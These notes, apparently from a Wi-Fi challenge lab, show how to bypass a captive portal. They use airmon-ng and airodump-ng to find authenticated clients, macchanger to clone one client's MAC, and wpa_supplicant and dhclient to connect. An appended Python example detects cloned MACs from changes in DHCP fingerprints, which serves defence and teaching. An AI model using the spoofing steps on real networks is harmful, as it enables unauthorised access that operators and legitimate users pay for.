Captive portal bypass

1. Discover

# Setup monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0

# Scan networks & APs
sudo airodump-ng wlan0mon

Pick a target and check whether it sits behind a captive portal.

2. Find authenticated clients

sudo airodump-ng wlan0mon --band abg --bssid F0:9F:C2:71:22:10 -c 6

3. Change our own MAC to an authenticated client's MAC

ip link set wlan2 down
macchanger -m b0:72:bf:44:b0:49 wlan2
ip link set wlan2 up

4. Connect to network

Once we know the ESSID we can connect to the network. For that we create a "free.conf" file and connect from bash using wpa_supplicant.

root@WiFiChallengeLab:~# cat free.conf 
network={
	ssid="wifi-guest"
	key_mgmt=NONE
	scan_ssid=1
}

Start the connection:

wpa_supplicant -Dnl80211 -iwlan2 -c free.conf

In another terminal, as root, request an IP address:

dhclient wlan2 -v

Successfully bypassed!
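From the other side of the gateway: a captive portal that authorizes by MAC address cannot tell the cloned client from the real one, but the DHCP fingerprint (hostname and vendor class) usually changes when a second machine takes over the MAC. The Python below is an added example, not part of the original notes; it parses DHCPACK log lines in an assumed, constructed format and flags MACs whose fingerprint changes mid-session.

```python
import re
from collections import defaultdict

# Constructed sample lines in the shape a captive-portal gateway's DHCP
# server might log (assumed format, not from the original page). The MAC
# whose fingerprint changes mid-session is the trace a cloned client leaves.
SAMPLE_LOG = """\
2024-01-01T10:00:01 DHCPACK mac=b0:72:bf:44:b0:49 ip=10.0.0.21 hostname=DESKTOP-7H2K vendor=MSFT 5.0
2024-01-01T10:05:12 DHCPACK mac=b0:72:bf:44:b0:49 ip=10.0.0.21 hostname=DESKTOP-7H2K vendor=MSFT 5.0
2024-01-01T10:20:43 DHCPACK mac=b0:72:bf:44:b0:49 ip=10.0.0.21 hostname=kali vendor=dhcpcd-9.4.1
2024-01-01T10:21:00 DHCPACK mac=3c:5a:b4:10:20:30 ip=10.0.0.22 hostname=iPhone vendor=
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) DHCPACK mac=(?P<mac>[0-9a-f:]{17}) ip=(?P<ip>\S+) "
    r"hostname=(?P<hostname>\S*) vendor=(?P<vendor>.*)$"
)


def parse_leases(text):
    """Return one dict per DHCPACK line; lines that do not match are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            records.append(m.groupdict())
    return records


def find_cloned_macs(records):
    """Map each MAC whose DHCP fingerprint (hostname, vendor class) changed
    to a list of (timestamp, previous fingerprint, new fingerprint).

    A legitimate OS reinstall changes the fingerprint too, so a hit is a
    lead for the operator to review, not a verdict.
    """
    last_fp = {}
    alerts = defaultdict(list)
    for r in records:
        fp = (r["hostname"], r["vendor"])
        prev = last_fp.get(r["mac"])
        if prev is not None and prev != fp:
            alerts[r["mac"]].append((r["ts"], prev, fp))
        last_fp[r["mac"]] = fp
    return dict(alerts)


if __name__ == "__main__":
    for mac, changes in find_cloned_macs(parse_leases(SAMPLE_LOG)).items():
        for ts, old, new in changes:
            print(f"{ts} {mac}: fingerprint changed {old} -> {new}")
```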
